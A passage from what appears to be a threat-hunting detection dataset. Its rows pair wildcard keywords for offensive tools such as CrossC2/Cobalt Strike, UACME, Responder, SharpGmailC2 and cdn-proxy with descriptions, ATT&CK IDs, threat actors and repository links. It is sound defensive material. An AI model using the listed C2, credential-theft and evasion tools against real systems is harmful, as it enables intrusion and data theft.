control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/CrossC2/CrossC2Kit,1,1,N/A,10,10,155,25,2023-08-08T19:52:07Z,2022-06-06T07:00:10Z -*cc2_portscan*,offensive_tool_keyword,crossc2,generate CobaltStrike's cross-platform payload,T1547.001 - T1055 - T1027 - T1105 - T1047,TA0002 - TA0005 - TA0011,N/A,N/A,C2,https://github.com/gloxec/CrossC2,1,1,N/A,10,10,1894,321,2023-08-08T20:02:44Z,2020-01-16T16:39:09Z -*cc2_portscan_*,offensive_tool_keyword,cobaltstrike,generate CobaltStrike's cross-platform payload,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/gloxec/CrossC2,1,1,N/A,10,10,1894,321,2023-08-08T20:02:44Z,2020-01-16T16:39:09Z -*cc2_rebind_*_get_recv*,offensive_tool_keyword,cobaltstrike,generate CobaltStrike's cross-platform payload,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/gloxec/CrossC2,1,1,N/A,10,10,1894,321,2023-08-08T20:02:44Z,2020-01-16T16:39:09Z -*cc2_rebind_*_get_send*,offensive_tool_keyword,cobaltstrike,generate CobaltStrike's cross-platform payload,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/gloxec/CrossC2,1,1,N/A,10,10,1894,321,2023-08-08T20:02:44Z,2020-01-16T16:39:09Z -*cc2_rebind_*_post_recv*,offensive_tool_keyword,cobaltstrike,generate CobaltStrike's cross-platform payload,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/gloxec/CrossC2,1,1,N/A,10,10,1894,321,2023-08-08T20:02:44Z,2020-01-16T16:39:09Z -*cc2_rebind_*_post_send*,offensive_tool_keyword,cobaltstrike,generate CobaltStrike's cross-platform payload,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/gloxec/CrossC2,1,1,N/A,10,10,1894,321,2023-08-08T20:02:44Z,2020-01-16T16:39:09Z -*cc2_udp_server*,offensive_tool_keyword,cobaltstrike,generate CobaltStrike's cross-platform payload,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/gloxec/CrossC2,1,1,N/A,10,10,1894,321,2023-08-08T20:02:44Z,2020-01-16T16:39:09Z -*cc2FilesColor.*,offensive_tool_keyword,cobaltstrike,CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/CrossC2/CrossC2Kit,1,1,N/A,10,10,155,25,2023-08-08T19:52:07Z,2022-06-06T07:00:10Z -*cc2ProcessColor.*,offensive_tool_keyword,cobaltstrike,CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/CrossC2/CrossC2Kit,1,1,N/A,10,10,155,25,2023-08-08T19:52:07Z,2022-06-06T07:00:10Z -*ccac7cdcbd419f3184c3886f5c36669ff9f7714b57a1249e2bb4be07b492c8ac*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*ccache2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*ccache2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*CCHOST=127.0.0.1*/tmp/c2*,offensive_tool_keyword,crossc2,generate CobaltStrike's cross-platform payload,T1547.001 - T1055 - T1027 - T1105 - T1047,TA0002 - TA0005 - TA0011,N/A,N/A,C2,https://github.com/gloxec/CrossC2,1,0,N/A,10,10,1894,321,2023-08-08T20:02:44Z,2020-01-16T16:39:09Z -*cckuailong/reapoc*,offensive_tool_keyword,reapoc,OpenSource Poc && Vulnerable-Target Storage Box.,T1552,TA0006,N/A,N/A,Exploitation tools,https://github.com/cckuailong/reapoc,1,1,N/A,N/A,7,629,219,2023-02-06T08:27:09Z,2021-11-28T00:46:27Z -*CCob/BOF.NET*,offensive_tool_keyword,cobaltstrike,A .NET Runtime for Cobalt Strike's Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/CCob/BOF.NET,1,1,N/A,10,10,557,86,2023-08-13T13:24:00Z,2020-11-02T20:02:55Z -*CCob/ThreadlessInject*,offensive_tool_keyword,ThreadlessInject,Threadless Process Injection using remote function hooking.,T1055.012 - T1055.003 - T1177,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/CCob/ThreadlessInject,1,1,N/A,10,6,552,55,2023-02-23T10:23:56Z,2023-02-05T13:50:15Z -*cd *.::$index_allocation*,greyware_tool_keyword,$index_allocation,creation of hidden folders (and file) via ...$.......::$index_allocation,T1027.001 - T1564.001,TA0005 ,N/A,N/A,Defense Evasion,https://soroush.me/blog/2010/12/a-dotty-salty-directory-a-secret-place-in-ntfs-for-secret-files/,1,0,N/A,8,10,N/A,N/A,N/A,N/A -*cd ./whereami/*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Beacon Object File (BOF) that uses handwritten shellcode to return the process Environment strings without touching any DLL's.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/boku7/whereami,1,0,N/A,10,10,152,27,2023-03-13T15:56:38Z,2021-08-19T22:32:34Z -*cd ffuf*,offensive_tool_keyword,ffuf,Fast web fuzzer written in Go,T1110 - T1550,TA0006 - TA0008,N/A,N/A,Reconnaissance,https://github.com/ffuf/ffuf,1,0,N/A,N/A,10,10177,1154,2023-09-20T16:02:23Z,2018-11-08T09:25:49Z -*cd golang_c2*,offensive_tool_keyword,golang_c2,C2 written in Go for red teams aka gorfice2k,T1071 - T1021 - T1043 - T1090,TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/m00zh33/golang_c2,1,0,N/A,10,10,4,8,2019-03-18T00:46:41Z,2019-03-19T02:39:59Z -*cd inceptor*,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion Framework,T1027 - T1055 - T1070 - T1112 - T1140,TA0005 - TA0006 - TA0008,N/A,N/A,Defense Evasion,https://github.com/klezVirus/inceptor,1,0,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z -*cd katoolin3*,offensive_tool_keyword,katoolin3,Katoolin3 brings all programs available in Kali Linux to Debian and Ubuntu.,T1203 - T1090 - T1020,TA0006 - TA0002 - TA0009,N/A,N/A,Exploitation tools,https://github.com/s-h-3-l-l/katoolin3,1,0,N/A,N/A,4,315,103,2020-08-05T17:21:00Z,2019-09-05T13:14:46Z -*cd koadic*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,0,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*cd ligolo*,offensive_tool_keyword,ligolo,ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve),T1071 - T1021 - T1573,TA0011 - TA0002,N/A,N/A,C2,https://github.com/sysdream/ligolo,1,0,N/A,10,10,1438,209,2023-01-06T19:49:22Z,2020-05-22T07:58:13Z -*cd PurplePanda*,offensive_tool_keyword,PurplePanda,This tool fetches resources from different cloud/saas applications focusing on permissions in order to identify privilege escalation paths and dangerous permissions in the cloud/saas configurations. Note that PurplePanda searches both privileges escalation paths within a platform and across platforms.,T1595 - T1078 - T1583 - T1087 - T1526,TA0003 - TA0004 - TA0007 - TA0040,N/A,N/A,Exploitation tools,https://github.com/carlospolop/PurplePanda,1,0,N/A,N/A,6,569,80,2023-08-07T04:13:59Z,2022-01-01T12:10:40Z -*CD3578F6-01B7-48C9-9140-1AFA44B3A7C0*,offensive_tool_keyword,CheeseTools,tools for Lateral Movement/Code Execution,T1021.006 - T1059.003 - T1105,TA0008 - TA0002,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/klezVirus/CheeseTools,1,0,N/A,10,7,653,138,2021-08-17T20:22:56Z,2020-08-24T01:28:12Z -*cd40dbcdae84b1c8606f29342066547069ed5a33*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,0,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*cddownloadelevategetprivsinjectpersistportscanpspwdrunassaveshellshutdownsleep*,offensive_tool_keyword,OffensiveNotion,Notion (yes the notetaking app) as a C2.,T1090 - T1090.002 - T1071 - T1071.001,TA0011 - TA0042,N/A,N/A,C2,https://github.com/mttaggart/OffensiveNotion,1,0,N/A,10,10,1002,111,2023-05-21T13:24:01Z,2022-01-18T16:39:54Z -*cdimage.kali.org/*,offensive_tool_keyword,kali,Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering,T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213,TA0001 - TA0002 - TA0009,N/A,N/A,Exploitation OS,https://www.kali.org/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*cdn_proxy cloudflare ,offensive_tool_keyword,cdn-proxy,cdn-proxy is a set of tools for bypassing IP allow listing intended to restrict origin access to requests originating from shared CDNs.,T1100 - T1090 - T1105 - T1133 - T1190,TA0003 - TA0008,,,Defense Evasion,https://github.com/RyanJarv/cdn-proxy,1,0,N/A,N/A,3,213,25,2022-08-25T00:40:25Z,2022-03-07T21:11:07Z -*cdn_proxy_burp_ext.py*,offensive_tool_keyword,cdn-proxy,cdn-proxy is a set of tools for bypassing IP allow listing intended to restrict origin access to requests originating from shared CDNs.,T1100 - T1090 - T1105 - T1133 - T1190,TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/RyanJarv/cdn-proxy,1,1,N/A,N/A,3,213,25,2022-08-25T00:40:25Z,2022-03-07T21:11:07Z -*cdn-proxy -*,offensive_tool_keyword,cdn-proxy,cdn-proxy is a set of tools for bypassing IP allow listing intended to restrict origin access to requests originating from shared CDNs.,T1100 - T1090 - T1105 - T1133 - T1190,TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/RyanJarv/cdn-proxy,1,0,N/A,N/A,3,213,25,2022-08-25T00:40:25Z,2022-03-07T21:11:07Z -*cdn-proxy cloudfront *,offensive_tool_keyword,cdn-proxy,cdn-proxy is a set of tools for bypassing IP allow listing intended to restrict origin access to requests originating from shared CDNs.,T1100 - T1090 - T1105 - T1133 - T1190,TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/RyanJarv/cdn-proxy,1,0,N/A,N/A,3,213,25,2022-08-25T00:40:25Z,2022-03-07T21:11:07Z -*cdn-proxy.git*,offensive_tool_keyword,cdn-proxy,cdn-proxy is a set of tools for bypassing IP allow listing intended to restrict origin access to requests originating from shared CDNs.,T1100 - T1090 - T1105 - T1133 - T1190,TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/RyanJarv/cdn-proxy,1,1,N/A,N/A,3,213,25,2022-08-25T00:40:25Z,2022-03-07T21:11:07Z -*cdn-proxy/burp_extension*,offensive_tool_keyword,cdn-proxy,cdn-proxy is a set of tools for bypassing IP allow listing intended to restrict origin access to requests originating from shared CDNs.,T1100 - T1090 - T1105 - T1133 - T1190,TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/RyanJarv/cdn-proxy,1,1,N/A,N/A,3,213,25,2022-08-25T00:40:25Z,2022-03-07T21:11:07Z -*Cdn-Proxy-Host*,offensive_tool_keyword,cdn-proxy,cdn-proxy is a set of tools for bypassing IP allow listing intended to restrict origin access to requests originating from shared CDNs.,T1100 - T1090 - T1105 - T1133 - T1190,TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/RyanJarv/cdn-proxy,1,1,N/A,N/A,3,213,25,2022-08-25T00:40:25Z,2022-03-07T21:11:07Z -*Cdn-Proxy-Origin*,offensive_tool_keyword,cdn-proxy,cdn-proxy is a set of tools for bypassing IP allow listing intended to restrict origin access to requests originating from shared CDNs.,T1100 - T1090 - T1105 - T1133 - T1190,TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/RyanJarv/cdn-proxy,1,0,N/A,N/A,3,213,25,2022-08-25T00:40:25Z,2022-03-07T21:11:07Z -*cdn-scanner -*,offensive_tool_keyword,cdn-proxy,cdn-proxy is a set of tools for bypassing IP allow listing intended to restrict origin access to requests originating from shared CDNs.,T1100 - T1090 - T1105 - T1133 - T1190,TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/RyanJarv/cdn-proxy,1,0,N/A,N/A,3,213,25,2022-08-25T00:40:25Z,2022-03-07T21:11:07Z -*CE895D82-85AA-41D9-935A-9625312D87D0*,offensive_tool_keyword,SharpGmailC2,Gmail will act as Server and implant will exfiltrate data via smtp and will read commands from C2 (Gmail) via imap protocol,T1071 - T1071.004 - T1568 - T1568.002 - T1114 - T1114.001,TA0011 - TA0040 - TA0001,N/A,N/A,C2,https://github.com/reveng007/SharpGmailC2,1,0,N/A,10,10,242,40,2022-12-27T01:45:46Z,2022-11-10T06:48:15Z -*cef0c644e3203b086519fbb77ccc50589b59d5b9a44adfb72a7f2bc6924e9878*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*celerystalk*,offensive_tool_keyword,celerystalk,celerystalk helps you automate your network scanning/enumeration process with asynchronous jobs (aka tasks) while retaining full control of which tools you want to run.,T1046 - T1057 - T1082 - T1087 - T1069,TA0001 - TA0007,N/A,N/A,Information Gathering,https://github.com/sethsec/celerystalk,1,0,N/A,N/A,4,389,75,2021-03-24T01:23:11Z,2018-08-13T04:21:37Z -*cerbrutus.py*,offensive_tool_keyword,cerbrutus,Network brute force tool. written in Python. Faster than other existing solutions (including the main leader in the network brute force market).,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/Cerbrutus-BruteForcer/cerbrutus,1,1,N/A,N/A,3,290,42,2021-08-22T19:05:45Z,2021-07-07T19:11:40Z -*Cerbrutus-BruteForcer*,offensive_tool_keyword,cerbrutus,Network brute force tool. written in Python. Faster than other existing solutions (including the main leader in the network brute force market).,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/Cerbrutus-BruteForcer/cerbrutus,1,1,N/A,N/A,3,290,42,2021-08-22T19:05:45Z,2021-07-07T19:11:40Z -*cert*responder.crt*,offensive_tool_keyword,responder,LLMNR. NBT-NS and MDNS poisoner,T1557.001 - T1171 - T1547.011,TA0011 - TA0005 - TA0003,N/A,N/A,Sniffing & Spoofing,https://github.com/SpiderLabs/Responder,1,0,N/A,N/A,10,4198,1633,2020-06-15T18:07:44Z,2012-10-24T14:35:12Z -*cert*responder.key*,offensive_tool_keyword,responder,LLMNR. NBT-NS and MDNS poisoner,T1557.001 - T1171 - T1547.011,TA0011 - TA0005 - TA0003,N/A,N/A,Sniffing & Spoofing,https://github.com/SpiderLabs/Responder,1,0,N/A,N/A,10,4198,1633,2020-06-15T18:07:44Z,2012-10-24T14:35:12Z -*certi.py_vulntemplates_output*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*certi_py_enum*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation 